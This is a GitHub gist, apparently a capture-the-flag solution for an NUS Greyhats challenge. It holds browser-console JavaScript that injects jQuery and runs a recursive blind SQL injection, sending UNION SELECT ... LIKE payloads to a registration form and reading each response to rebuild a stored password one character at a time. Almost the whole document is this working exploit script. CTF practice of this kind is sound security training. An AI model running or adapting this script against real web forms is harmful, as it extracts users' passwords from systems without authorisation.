Skip to content

Instantly share code, notes, and snippets.

@ZhangYiJiang
Created August 22, 2015 13:09
Show Gist options
  • Save ZhangYiJiang/64ff59a07e05edf44f32 to your computer and use it in GitHub Desktop.
Save ZhangYiJiang/64ff59a07e05edf44f32 to your computer and use it in GitHub Desktop.
NUS Greyhats CTF Day 2 - Brute force password cracking on a blind SQL injection form
// Run this first: injects jQuery into the page
var s = document.createElement('script');
s.src = 'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js';
document.body.appendChild(s);
// SQL query: 1' AND FALSE UNION SELECT * FROM users WHERE password LIKE 'a%' #
// Recursive function to brute force out the password from the page
function getPassword(p) {
$.post('http://web.nusgreyhats.org/blindsqli/register.php', {
register: "1' AND FALSE UNION SELECT * FROM users WHERE password LIKE '" + p + "%' #"
}, function(data){
if (data.indexOf('Someone has already registered ') !== -1) {
console.log(p);
for (var i = 32; i <= 126; i++) {
if (["'", "%", "_"].indexOf(String.fromCharCode(i)) !== -1) continue;
getPassword(p + String.fromCharCode(i));
}
}
});
}
getPassword('');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment